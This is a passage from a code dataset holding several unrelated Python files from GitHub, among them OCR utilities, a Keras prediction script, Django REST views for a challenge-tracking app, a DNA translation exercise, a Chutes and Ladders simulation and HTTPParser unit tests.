max(result_boxes[i][j][1] for j in range(4))) / 2\n if y_between < y_end_line and y_between > y_start_line:\n box_ok.append(result_boxes[i])\n text_ok.append(result_texts[i])\n # No box satisfy\n if len(box_ok) == 0:\n result_texts_sorted.append(result_texts[index])\n result_boxes_sorted.append(result_boxes[index])\n continue\n # 1 box satisfy\n elif len(box_ok) == 1:\n if box_ok[0][0][0] >= left_top_point[0]: # Element first in list box_ok\n text_link = result_texts[index] + \" \" + text_ok[0]\n result_texts_sorted.append(text_link)\n else:\n result_texts_sorted.append(result_texts[index])\n # result_boxes_sorted.append(result_boxes[index])\n continue\n # Multi box satisfy -> select box nearest with box processing\n else:\n index_box = None\n distance_min = 10000\n for index_box_temp, box in enumerate(box_ok):\n temp = box[0][0] - left_top_point[0]\n if (temp > 0) and (temp < distance_min) and (box[0][0] < width / 4 * 3):\n distance_min = temp\n index_box = index_box_temp\n\n # Exist box satisfy distance min\n if index_box != None:\n text_link = result_texts[index] + \" \" + text_ok[index_box]\n result_texts_sorted.append(text_link)\n # No Exist box satisfy\n else:\n result_texts_sorted.append(result_texts[index])\n else:\n result_texts_sorted.append(result_texts[index])\n\n return result_texts_sorted\n\ndef recognize_text(result_boxes, image, recognize):\n # Recognize image -> text in ever text_box\n result_texts = []\n for index, point in enumerate(result_boxes):\n point = margin_pst(point)\n # Transform for text not tilted\n image_ocr = four_point_transform(image, point)\n image_ocr = cv2.cvtColor(image_ocr, cv2.COLOR_BGR2RGB)\n image_ocr = Image.fromarray(image_ocr)\n result_text = recognize.predict(image_ocr)\n result_texts.append(result_text)\n\n # Reverse of texts, boxes\n result_texts.reverse()\n result_boxes = result_boxes[::-1]\n\n return result_texts, result_boxes\n\ndef recognize_text_title(result_boxes, image, recognize,\n list_title_contracts, list_config_contracts):\n # Recognize image -> text in ever text_box\n result_texts = []\n for index, point in enumerate(result_boxes[::-1]):\n point = margin_pst(point)\n # Transform for text not tilted\n image_ocr = four_point_transform(image, point)\n image_ocr = cv2.cvtColor(image_ocr, cv2.COLOR_BGR2RGB)\n image_ocr = Image.fromarray(image_ocr)\n result_text = recognize.predict(image_ocr)\n # Because result_text is title:\n # Check length of line > 50 and\n # count character upper in this line < len(character in line) /2\n # -> page not first page\n len_result_text = len(result_text)\n if len_result_text > 50 and count_upper(result_text) < (len_result_text / 2):\n return False\n text_box_lower_unidecode = unidecode(result_text)\n for index_contract, title in enumerate(list_title_contracts):\n # Replace character special = \"\", because detect . , ...\n # Case detect missing character special will error\n text_box_lower_unidecode = re.sub('[^A-Za-z0-9& ]+', '',\n text_box_lower_unidecode)\n if re.search(text_box_lower_unidecode, title, re.IGNORECASE) != None and \\\n len(text_box_lower_unidecode) > (len(title) / 4 * 3):\n logger.info(text_box_lower_unidecode)\n return True\n return False\n\ndef replace_spell(text_test):\n words = [\n \n ]\n\n for word in words:\n word_lower_unidecode = unidecode(word.lower())\n result_search = re.search(word_lower_unidecode, unidecode(text_test), re.IGNORECASE)\n if result_search is not None:\n (start_point, end_point) = result_search.span()\n text_test = text_test.replace(text_test[start_point:end_point], word)\n\n return text_test\n\n\ndef count_upper(str):\n # upper, lower, number, special = 0, 0, 0, 0\n upper = 0\n for i in range(len(str)):\n if str[i].isupper():\n upper += 1\n # elif str[i].islower():\n # lower += 1\n # elif str[i].isdigit():\n # number += 1\n # else:\n # special += 1\n\n return upper\n\ndef timeit(func):\n @wraps(func)\n def timeit_wrapper(*args, **kwargs):\n start_time = time.perf_counter()\n result = func(*args, **kwargs)\n end_time = time.perf_counter()\n total_time = end_time - start_time\n print(f'Function {func.__name__}{args} {kwargs} Took {total_time:.4f} seconds')\n return result\n return timeit_wrapper\n\n","repo_name":"wolfghost9989/ExtractPDF","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28236594946","text":"import csv\n\nfrom cnn.keras.models.d3H_avg.model import build_model\nfrom cnn.keras.prediction.predict_generator import predict_generator\nfrom cnn.keras.d3.preprocessing.image_processing import inputs\nfrom cnn.keras.d3.preprocessing.predict_generator import target_size, GRID\nfrom cnn.keras.d3.train import _split_scans, classes\n\n\nbatch_size = 64\nnum_samples = 481 * len(GRID)\npath_weights = '/home/mhubrich/checkpoints/adni/d3H_avg_3/weights.193-loss_0.363-acc_0.849.h5'\n\n\ndef predict():\n # Get inputs for labeling\n _, scans_test = _split_scans()\n test_inputs = inputs(scans_test, target_size, batch_size, classes, 'test', seed=None)\n\n # Set up the model\n model = build_model(num_classes=len(classes), input_shape=(1,)+target_size)\n model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\n model.load_weights(path_weights)\n\n # Start labeling\n pred, filenames = predict_generator(model,\n test_inputs,\n val_samples=num_samples,\n max_q_size=256,\n nb_preprocessing_threads=2)\n\n return pred, filenames\n\n\ndef write_submission(predictions, filenames):\n with open('predictions_d3H_avg_3_193-0_36_4.csv', 'wb') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n for i in xrange(0, len(predictions)):\n tmp = [filenames[i]]\n for p in predictions[i]:\n tmp.append(p)\n writer.writerow(tmp)\n print('%d predicitons written.' % (len(predictions)))\n\n\nif __name__ == \"__main__\":\n predictions, filenames = predict()\n write_submission(predictions, filenames)\n\n","repo_name":"mhubrich/adni-python","sub_path":"cnn/keras/prediction/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"25853096324","text":"print(\" *** Divisible number *** \")\nx= int(input(\"Enter a positive number : \"))\nif x == 0 :\n print(\"0 is OUT of range !!!\")\nelif x != 0 :\n list = []\n for i in range(1, x + 1):\n if x % i == 0:\n list.append(i)\n str = ' '.join(map(str, list))\n long = len(list)\n print(\"Output ==> \"+str)\n print(\"Total ==>\",long)\n","repo_name":"PcrPz/OOD","sub_path":"Week_12_Pratice/12_2_Python.py","file_name":"12_2_Python.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10659357544","text":"import sys\npath = '/data.nst/arana/olfaction_circuitry/'\nif path not in sys.path:\n sys.path.insert(1, path)\nfrom classes import *\nfrom plotting import *\nfrom odor_input import *\nfrom utils import *\n\n## Parameters of the run\n## Odors maxed, ORN and Neurons as measured\nn_odor = 34\nn_ORN = 21\nn_neuron = 56\nn_train_odor_repeats = 500 ## need 500 to learn fully generally\nn_test_odor_repeats = 50 ## each odor presented x times\npresentation_length = 1000 #ms\ndt = 0.5 #ms\nn_train_odors = n_train_odor_repeats*n_odor ## total odors trained\nodor_log_interval = 50\nfolder_name = path + \"simulations/220725\"\nproject_name = \"meas_comp_samuel2019\"\nodor_file = path + 'odor_data/samuel2019_-4_raw.csv'\n\n## Define the settings dictionary from the standard one\ns = Settings()\ns.set('presentation_length', presentation_length) ## ms here since default dt is 1\ns.set('fade_fraction', 0.2)\ns.set('input_tau_inc', 50)\ns.set('rho', 0.001)\ns.set('dt', dt)\ns.set('n_odors', n_odor)\ns.set('n_ORN', n_ORN)\ns.set('n_stim', n_ORN)\ns.set('n_neuron', n_neuron)\ns.set('folder_name', \"'%s'\" % folder_name)\ns.set('project_name', \"'%s'\" % project_name)\ns.set('dynamic_log_interval', s.presentation_length*odor_log_interval)\ns.set('dynamic_sample_interval', 5)\ns.set('dynamic_log_test_set', n_odor*2)\ns.set('n_train_repeat', n_train_odor_repeats)\ns.set('n_test_repeat', n_test_odor_repeats)\n## Since presentation length increased 10-fold, need to also change learning rates to decrease 10+-fold\ns.input_selector = get_odor_rate\ns.odor_file = odor_file\ns.MBON_settings_dict = {\"c\": 10, \"learning_rate\": 0.000001}\ns.set('update_interval', presentation_length*n_odor*5) ## for biases - needs to be at least as long as odor presentation time * num odors\ns.plasticity = Analytic_Simple()\n\nlog_file = folder_name+\"/\"+project_name + \"_log\"\nwith gzip.open(log_file, 'r') as f:\n log = pickle.load(f)\nassert isinstance(log, Log)\nfinal_time = max(log.snapshots.keys())\nfinal_snap = log.snapshots[final_time]\ns = final_snap[\"s\"]\nprint(\"Odors Trained on:\", int(final_time/s.presentation_length))\n\nnet = SomaticNet(s)\nnet.feedforward_weights = final_snap[\"feedforward_weights\"]\nnet.recurrent_weights = final_snap[\"recurrent_weights\"]\nnet.neuron_biases = final_snap[\"biases\"]\nnet.decoder_matrix = final_snap[\"decoder\"]\n\nmeas_file = path + \"connectivity_data/PN_KC_Meas.csv\"\n\nmeas = read_meas_connectivity(meas_file, s)\nmeas_input_corr = compute_PN_input_correlations(meas, s)\nprint(\"Measured input correlations: \", meas_input_corr)\n\nmeas_io_corr = compute_input_output_correlations(meas, s)\nprint(\"Measured input output correlations: \", meas_io_corr)\n\nopt_map, opt_mse = map_sim_to_meas_connectivity(net, meas, s)\nprint(\"Optimum mapping: \", opt_map)\nprint(\"Optimum MSE: \", opt_mse, np.mean(opt_mse))\n## Plot MSE here\nopt_input_corr = compute_PN_input_correlations(net.feedforward_weights, s)\nprint(\"Optimum input correlations: \", opt_input_corr)\n\nopt_io_corr = compute_input_output_correlations(net.feedforward_weights, s)\nprint(\"Optimum input output correlations: \", opt_io_corr)\n\n\nrandom = SomaticNet(s)\nlog_file = folder_name+\"/\"+project_name + \"_random\" + \"_log\"\nwith gzip.open(log_file, 'r') as f:\n log = pickle.load(f)\nassert isinstance(log, Log)\nfinal_time = max(log.snapshots.keys())\nfinal_snap = log.snapshots[final_time]\ns = final_snap[\"s\"]\nprint(\"Odors Trained on:\", int(final_time/s.presentation_length))\nrandom.feedforward_weights = final_snap[\"feedforward_weights\"]\nrandom.recurrent_weights = final_snap[\"recurrent_weights\"]\nrandom.neuron_biases = final_snap[\"biases\"]\nrandom.decoder_matrix = final_snap[\"decoder\"]\n\n\nran_map, ran_mse = map_sim_to_meas_connectivity(random, meas, s)\nprint(\"Random mapping: \", ran_map)\nprint(\"Random MSE: \", ran_mse, np.mean(ran_mse))\n\nran_input_corr = compute_PN_input_correlations(random.feedforward_weights, s)\nprint(\"Random input correlations: \", ran_input_corr)\n\nran_io_corr = compute_input_output_correlations(random.feedforward_weights, s)\nprint(\"Random input output correlations: \", ran_io_corr)\n## One idea for classification: reward function from odor to [-1, 1]; use NN with one output node to classify this; single metric\n## But original idea is have a 110 layer output function with softmax for interpretation; densify these connections and learn\n## Could do sparsity as you can do L1 adaptation as db = r_1 - 0.1;\n## TODO:\n## Random network by doing probabilistic version of nature paper; could also do binary and see what happens\n## 5. Pruning: Do the derivation for Laplace multiplier sparsity constraint leading to different weight decay trick\n## 6. Finish compensatory variability paper and check if we see these correlations or not in our learned network\n## 8. Andre's data as starting feedforward, do other metrics\n## Do param search on rho to find best one?\n## Try with spikes added instead of plain rates\n## Try on original dataset\n\n## 50 neurons, 50 + 20 odors\n## Implement plot where train classifier with different amounts of training data (same epochs to converge) and see learning rate\n\n## Parameters to add to plot:\n## 1. Input data: dataset, n_odor, n_ORN\n## 2. Network: n_neuron, rho, train size, test size, plasticity, learning rates\n## 3. Input dynamics: shape of profile, presentation length, stim_on_frac\n\n## Compute MSE between overlap of model and experiment neuron connectivity for random and model:\n# - Look at each optimized KC and find the best match in measured. Then, compute MSE totally and check against random.\n## Correlations between PNs inputting to singular KC to average correlation weight for random, model and data; we'd expect this is high\n## Run the network on the measured feedforward weights instead and see what happens for classification\n\n## To do thresholding, can set relu threshold and see when the reconstruction fails and find that threshold; then fix F and train \n## Then sparse connectivity can do find PNs with nonzero weights, and find average (weighted by product of weights?) of pairwise correlations of firing rates over different odors\n## Newer paper has non-random PN-KC connectivity - see if you can reproduce that result\n\n## Our network better works with more vs less frequent odors\n## But generalizes worse with new odors\n\n\n\n## Concentration to PN noise data: 4 data points from Olsen 2010 & also 19 stimuli for 3 concentrations in Hallem & Carlson\n## Fig 3 from Hallem & Carlson 2006 for 4 ORNs shows no obvious pattern in concentration-ORN - diff for each odor.\n## Fig 4, Table S2 has 24 ORNs for 10 pure, 9 fruit odors - no clear pattern here too, so heuristic seems wise to do the\n## std dev of inverse tuning curve as concentration proxy FILL PAPER HERE\n## At low concentrations of 1e-8, generally only 1 or 2 odors responded even for the broadly tuned receptors","repo_name":"agastya-rana/olfaction-circuitry","sub_path":"code/connectivity_comparison.py","file_name":"connectivity_comparison.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21417654769","text":"import math\nimport json\nimport logging\nfrom collections import OrderedDict\nfrom datetime import datetime, timedelta\n\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.decorators import permission_classes\n\nfrom .models import (\n Challenge,\n ChallengeSchedule,\n ChallengeCompletionEntry\n)\nfrom .serializers import (\n ChallengeSerializer,\n ChallengeScheduleSerializer,\n ChallengeCompletionEntrySerializer\n)\n\nlogger = logging.getLogger('django')\n\n\nclass ChallengeListApiView(APIView):\n @permission_classes([IsAuthenticated])\n def get(self, request, *args, **kwargs):\n challenges = Challenge.objects.all()\n serializer = ChallengeSerializer(challenges, many=True)\n logger.info('Retrieved %s challenge entries', len(serializer.data))\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @permission_classes([IsAuthenticated])\n def post(self, request, *args, **kwargs):\n data = {\n 'title': request.data.get('title'),\n 'start_date': datetime.strptime(request.data.get('start_date').split('T')[0], '%Y-%m-%d').date(),\n 'end_date': datetime.strptime(request.data.get('end_date').split('T')[0], '%Y-%m-%d').date()\n }\n serializer = ChallengeSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ChallengeApiView(APIView):\n def get_object(self, challenge_id):\n try:\n return Challenge.objects.get(challenge_id=challenge_id)\n except Challenge.DoesNotExist:\n return None\n\n @permission_classes([IsAuthenticated])\n def get(self, request, challenge_id, *args, **kwargs):\n challenge_instance = self.get_object(challenge_id)\n if not challenge_instance:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n serializer = ChallengeSerializer(challenge_instance)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @permission_classes([IsAuthenticated])\n def put(self, request, challenge_id, *args, **kwargs):\n challenge_instance = self.get_object(challenge_id)\n if not challenge_instance:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n data = {\n 'title': request.data.get('title'),\n 'start_date': datetime.strptime(request.data.get('start_date').split('T')[0], '%Y-%m-%d').date(),\n 'end_date': datetime.strptime(request.data.get('end_date').split('T')[0], '%Y-%m-%d').date()\n }\n serializer = ChallengeSerializer(instance=challenge_instance, data=data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n @permission_classes([IsAuthenticated])\n def delete(self, request, challenge_id, *args, **kwargs):\n challenge_instance = self.get_object(challenge_id)\n if not challenge_instance:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n challenge_instance.delete()\n return Response(\n {'res': 'Object with challenge id {} deleted'.format(challenge_id)},\n status=status.HTTP_200_OK\n )\n\n\nclass ChallengeSchedulesApiView(APIView):\n @permission_classes([IsAuthenticated])\n def get(self, request, challenge_id, *args, **kwargs):\n try:\n challenge = Challenge.objects.get(challenge_id=challenge_id)\n except ObjectDoesNotExist:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n challenge_schedules = ChallengeSchedule.objects.filter(challenge_id=challenge)\n serializer = ChallengeScheduleSerializer(challenge_schedules, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass ChallengeCompletionEntriesApiView(APIView):\n @permission_classes([IsAuthenticated])\n def get(self, request, challenge_id, *args, **kwargs):\n try:\n challenge = Challenge.objects.get(challenge_id=challenge_id)\n except ObjectDoesNotExist:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n challenge_completion_entries = ChallengeCompletionEntry.objects.filter(challenge_schedule_id__challenge_id=challenge)\n serializer = ChallengeCompletionEntrySerializer(challenge_completion_entries, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass ChallengeSummaryApiView(APIView):\n @permission_classes([IsAuthenticated])\n def get(self, request, challenge_id, *args, **kwargs):\n try:\n challenge = Challenge.objects.get(challenge_id=challenge_id)\n except ObjectDoesNotExist:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n challenge_schedules = ChallengeSchedule.objects.filter(challenge_id=challenge)\n\n # Result structure passed into the HTTP response at the end:\n result = {'headers': [], 'body': []}\n\n # Get the participating users:\n users = OrderedDict()\n for schedule in challenge_schedules:\n users[schedule.user_id.id] = schedule.user_id.username\n result['headers'] = ['date'] + [value for _, value in users.items()]\n\n logger.info('Creating summary for users: %s', users)\n\n # Generate the days of the challenge:\n no_of_days = (challenge.end_date - challenge.start_date).days + 1\n logger.info('Challenge summary start and end dates: %s - %s, delta: %s', challenge.start_date,\n challenge.end_date, no_of_days)\n date_entries = OrderedDict()\n for n in range(no_of_days):\n date_str = str(challenge.start_date + timedelta(days=n))\n date_entries[date_str] = OrderedDict()\n for _, name in users.items():\n date_entries[date_str][name] = OrderedDict()\n\n date_entries['Total'] = OrderedDict()\n for _, name in users.items():\n date_entries['Total'][name] = OrderedDict()\n\n logger.debug('Date entries: %s', date_entries)\n\n for schedule in challenge_schedules:\n username = schedule.user_id.username\n ch_type = schedule.challenge_type_id.name\n\n # Basic data: no. of days FROM schedule start date TO challenge end date\n no_of_days = (challenge.end_date - schedule.start_date).days + 1\n logger.debug('%s %s %s %s %s', username, schedule.start_date, schedule.day_frequency, no_of_days,\n schedule.daily_goal)\n\n # Adding the target entries based on the day frequency:\n date_delta = timedelta(days=schedule.day_frequency)\n d = schedule.start_date\n while d <= challenge.end_date:\n d_str = str(d)\n if ch_type not in date_entries[d_str][username]:\n date_entries[d_str][username][ch_type] = OrderedDict()\n date_entries[d_str][username][ch_type]['target'] = schedule.daily_goal\n date_entries[d_str][username][ch_type]['unit'] = schedule.challenge_type_id.unit\n d = d + date_delta\n\n # Adding the completion entries:\n total_completion = 0\n completion_entries = ChallengeCompletionEntry.objects.filter(challenge_schedule_id=schedule)\n for entry in completion_entries:\n date_str = str(entry.timestamp.date())\n if ch_type not in date_entries[date_str][username]:\n date_entries[date_str][username][ch_type] = OrderedDict()\n date_entries[date_str][username][ch_type]['unit'] = schedule.challenge_type_id.unit\n if 'completed' not in date_entries[date_str][username][ch_type]:\n date_entries[date_str][username][ch_type]['completed'] = 0.0\n current = date_entries[date_str][username][ch_type]['completed']\n date_entries[date_str][username][ch_type]['completed'] = current + entry.amount\n total_completion = total_completion + entry.amount\n\n total_dict = OrderedDict([('target', schedule.daily_goal * math.ceil(no_of_days / schedule.day_frequency)),\n ('unit', schedule.challenge_type_id.unit),\n ('completed', total_completion)])\n date_entries['Total'][username][ch_type] = total_dict\n\n logger.debug('Date entries: %s', json.dumps(date_entries, indent=2))\n\n for date_str, value in date_entries.items():\n value['date'] = date_str\n result['body'].append(value)\n\n logger.debug('Result: %s', json.dumps(result, indent=2))\n\n return Response(result, status=status.HTTP_200_OK)\n","repo_name":"laszlzso/ChallengeMe","sub_path":"back_end/challenge_me/challenge_app/challenge_views.py","file_name":"challenge_views.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"72572249765","text":"\ndef Transcription(dna):\n if len(dna)%3==0:\n print(\"The input DNA seq is \")\n print()\n print(dna)\n print()\n mrna=\"\"\n for i in dna:\n if i==\"A\":\n mrna+=\"U\"\n elif i==\"T\":\n mrna+=\"A\"\n elif i==\"C\":\n mrna+=\"G\"\n elif i==\"G\":\n mrna+=\"C\"\n return mrna\n else:\n print(\"Please enter a valid DNA sequence.\")\n \ndef mrna_seq(sequence):\n mrna_codons=[]\n for i in range(0,len(sequence),3):\n mrna_codons.append(sequence[i:i+3])\n return mrna_codons\n\ndef Translation(codons):\n proteins=[]\n for i in codons:\n if i==\"GCA\" or i==\"GCC\" or i==\"GCG\" or i==\"GCU\":\n proteins.append(\"Ala\")\n if i==\"AGA\" or i==\"AGG\" or i==\"CGA\" or i==\"CGC\" or i==\"CGG\" or i==\"CGU\":\n proteins.append(\"Arg\")\n if i==\"AAC\" or i==\"AAU\":\n proteins.append(\"Asn\")\n if i==\"GAC\" or i ==\"GAU\":\n proteins.append(\"Asp\")\n if i==\"UGC\" or i==\"UGU\":\n proteins.append(\"Cys\")\n if i==\"GAA\" or i==\"GAG\":\n proteins.append(\"Glu\")\n if i==\"CAA\" or i==\"CAG\":\n proteins.append(\"Gln\")\n if i==\"GGA\" or i==\"GGC\" or i==\"GGG\" or i==\"GGU\":\n proteins.append(\"Gly\")\n if i==\"CAC\" or i==\"CAU\":\n proteins.append(\"His\")\n if i==\"AUA\" or i==\"AUC\" or i==\"AUU\":\n proteins.append(\"Ile\")\n if i==\"UUA\" or i==\"UUG\" or i==\"CUA\" or i==\"CUC\" or i==\"CUG\" or i==\"CUU\":\n proteins.append(\"Leu\")\n if i==\"AAA\" or i==\"AAG\":\n proteins.append(\"Lys\")\n if i==\"AUG\":\n proteins.append(\"Met\")\n if i==\"UUC\" or i==\"UUU\":\n proteins.append(\"Phe\")\n if i==\"CCA\" or i==\"CCC\" or i==\"CCG\" or i==\"CCU\":\n proteins.append(\"Pro\")\n if i==\"AGC\" or i==\"AGU\" or i==\"UCA\" or i==\"UCC\" or i==\"UCG\" or i==\"UCU\":\n proteins.append(\"Ser\")\n if i==\"ACA\" or i==\"ACC\" or i==\"ACG\" or i==\"ACU\":\n proteins.append(\"Thr\")\n if i==\"UGG\":\n proteins.append(\"Trp\")\n if i ==\"UAC\" or i==\"UAU\":\n proteins.append(\"Tyr\")\n if i==\"GUA\" or i==\"GUC\" or i==\"GUG\" or i==\"GUU\":\n proteins.append(\"Val\")\n return proteins\n \ndef protein_seq(aminoacids):\n return(aminoacids)\n \ndef table(mrna,protein):\n merge=tuple(zip(mrna,protein))\n column_length=[]\n element_tup=2\n for i in range(element_tup):\n column_length.append(max(len(j[i])+2 for j in merge))\n for j in merge:\n for i in range(element_tup):\n print(j[i].ljust(column_length[i]),end=\" \")\n print()\n\ndef proteinseq(a):\n s=\"\"\n for i in a:\n s+=\"->\"+i\n return s\n \n \n \n \nsequence=Transcription(\"TTAGTGGGCAGAGTTGAGTACACAAGTAAC\")\ncodons=mrna_seq(sequence)\naminoacids=Translation(codons)\na=aminoacids\nprint(\"The corresponding mRNA sequence is: \")\nprint()\nprint(mrna_seq(sequence))\nprint()\nmrna=mrna_seq(sequence)\nprotein=protein_seq(aminoacids)\nprint()\nprint(\"In table form:\")\nprint(\"--------------\")\nprint(\"mRNA Protein\")\nprint(\"--------------\")\ntable(mrna,protein)\nprint(\"The protein sequence is:\")\nprint()\nprint(proteinseq(a))","repo_name":"li06072/Projects","sub_path":"pfunproject.py","file_name":"pfunproject.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21549179714","text":"#GCD * LCM = product of the numbers!\r\nt=int(input())\r\nfor i in range(t):\r\n a,b=map(int,input().split())\r\n rep1=a; rep2=b\r\n while(True):\r\n if a==0 or b==0:\r\n break\r\n elif a>b:\r\n a%=b\r\n elif a 100: # Must land on 100 exactly\n Next = Start\n else:\n Next = Start + s\n if Next == 1:\n Next = 38\n elif Next == 4:\n Next = 14\n elif Next == 9:\n Next = 31\n elif Next == 16:\n Next = 7\n elif Next == 21:\n Next = 42\n elif Next == 28:\n Next = 84\n elif Next == 36:\n Next = 44\n elif Next == 48:\n Next = 26\n elif Next == 49:\n Next = 11\n elif Next == 51:\n Next = 67\n elif Next == 56:\n Next = 53\n elif Next == 62:\n Next = 19\n elif Next == 64:\n Next = 60\n elif Next == 71:\n Next = 91\n elif Next == 80:\n Next = 100\n elif Next == 87:\n Next = 24\n elif Next == 93:\n Next = 73\n elif Next == 95:\n Next = 76\n elif Next == 98:\n Next = 78\n\n return Next\n\ndef main():\n n = 10**6\n winners = [[0, 0] for _ in range(n)]\n MaximumMoves = 200\n OneWins = 0\n TwoWins = 0\n MovesWhenOneWins = 0\n MovesWhenTwoWins = 0\n MaximumMovesExceeded = 0\n\n for i in range(n):\n winners[i] = ChutesAndLaddersGame(MaximumMoves)\n\n if winners[i][0] == 1:\n OneWins += 1\n MovesWhenOneWins += winners[i][1]\n elif winners[i][0] == 2:\n TwoWins += 1\n MovesWhenTwoWins += winners[i][1]\n else:\n MaximumMovesExceeded += 1\n\n OneWinsPercentage = 100 * OneWins / (OneWins + TwoWins)\n AverageMovesPerOneWin = MovesWhenOneWins / OneWins\n AverageMovesPerTwoWin = MovesWhenTwoWins / TwoWins\n\n print(f\"Player One wins {OneWinsPercentage:.2f}% of the time.\")\n print(f\"Average moves when Player One wins: {AverageMovesPerOneWin:.2f}\")\n print(f\"Average moves when Player Two wins: {AverageMovesPerTwoWin:.2f}\")\n print(f\"Maximum number of moves {MaximumMoves} exceeded {MaximumMovesExceeded} times\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AppleKimCalvario/test","sub_path":"MonteCarlo.py","file_name":"MonteCarlo.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6377711445","text":"import unittest\n\nimport Axon\nimport Axon.Scheduler as Scheduler\nfrom Axon.Ipc import shutdown\nfrom HTTPParser import HTTPParser\n\nclass Recorder(Axon.Component.component):\n def __init__(self):\n super(Recorder, self).__init__()\n self.heard = []\n \n def main(self):\n while 1:\n yield 1\n while self.dataReady(\"inbox\"):\n temp = self.recv(\"inbox\")\n #print temp\n self.heard.append(temp)\n \n while self.dataReady(\"control\"):\n temp = self.recv(\"control\")\n \nclass HTTPParser_Test(unittest.TestCase):\n \"\"\"A set of tests for the HTTPParser class.\"\"\"\n def test_smokeTest(self):\n \"\"\"__init__ - Called with no arguments succeeds\"\"\"\n P = HTTPParser()\n self.assert_(isinstance(P, Axon.Component.component))\n \n def test_shutdownMessageCausesShutdown(self):\n \"\"\"main - If the component recieves a shutdown() message, the component shuts down\"\"\"\n P = HTTPParser()\n P.activate()\n\n P._deliver(shutdown(), \"control\")\n\n componentExit = False\n for i in xrange(2000):\n try:\n P.next()\n except StopIteration:\n componentExit = True\n break\n if not componentExit:\n self.fail(\"When sent a shutdown message, the component should shutdown\")\n \n def test_shouldPause(self):\n \"\"\"main - If the component receives no input it pauses\"\"\"\n P = HTTPParser()\n P.activate()\n\n componentExit = False\n for i in xrange(2000):\n if not P._isRunnable():\n break\n try:\n P.next()\n except StopIteration:\n componentExit = True\n break\n if componentExit or P._isRunnable():\n self.fail(\"If the component receives no input it should pause rather than busywait\")\n \n def test_validRequest(self): \n P = HTTPParser()\n R = Recorder()\n R.link( (P, \"outbox\"), (R, \"inbox\"))\n R.activate()\n P.activate()\n P._deliver(\"HEAD http://localhost/temp.txt?wibble&foo=bar HTTP/1.1\\r\\nConnection: keep-alive\\r\\nHost: localhost\\r\\n\\r\\n\", \"inbox\")\n componentExit = False\n for i in xrange(2000):\n if len(R.heard) > 0:\n break\n try:\n P.next()\n R.next()\n except StopIteration:\n pass\n \n if len(R.heard) == 0:\n self.fail(\"If the component receives a valid and complete HTTP request it should output a request object\")\n else:\n requestobject = R.heard[0]\n if requestobject.get(\"uri-server\",\"\") != \"localhost\":\n self.fail(\"If the component receives a valid and complete HTTP request it should output a request object containing the correct uri-server item\")\n elif requestobject.get(\"raw-uri\",\"\") != \"/temp.txt?wibble&foo=bar\":\n self.fail(\"If the component receives a valid and complete HTTP request it should output a request object containing the correct raw-uri item\")\n elif requestobject.get(\"version\",\"\") != \"1.1\":\n self.fail(\"If the component receives a valid and complete HTTP request it should output a request object containing the correct version item\")\n elif requestobject.get(\"bad\",True) != False:\n self.fail(\"If the component receives a valid and complete HTTP request it should output a request object containing \\\"bad\\\":False\")\n \n def test_incoherentRequest(self):\n \"\"\"main - Non-HTTP requests are marked bad\"\"\"\n P = HTTPParser()\n R = Recorder()\n R.link( (P, \"outbox\"), (R, \"inbox\"))\n R.activate()\n P.activate()\n P._deliver(\"ecky\\n\\n\\n\\n\", \"inbox\")\n componentExit = False\n for i in xrange(2000):\n if len(R.heard) > 0:\n break\n try:\n P.next()\n R.next()\n except StopIteration:\n pass\n if len(R.heard) == 0:\n self.fail(\"If the component receives non-HTTP requests it should send on a bad request message - none sent\")\n elif not R.heard[0].get(\"bad\",False):\n self.fail(\"If the component receives non-HTTP requests it should send on a bad request message\")\n \nif __name__=='__main__':\n unittest.main()\n","repo_name":"sparkslabs/kamaelia_","sub_path":"Sketches/RJL/test/test_HTTPParser.py","file_name":"test_HTTPParser.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"19416574534","text":"import 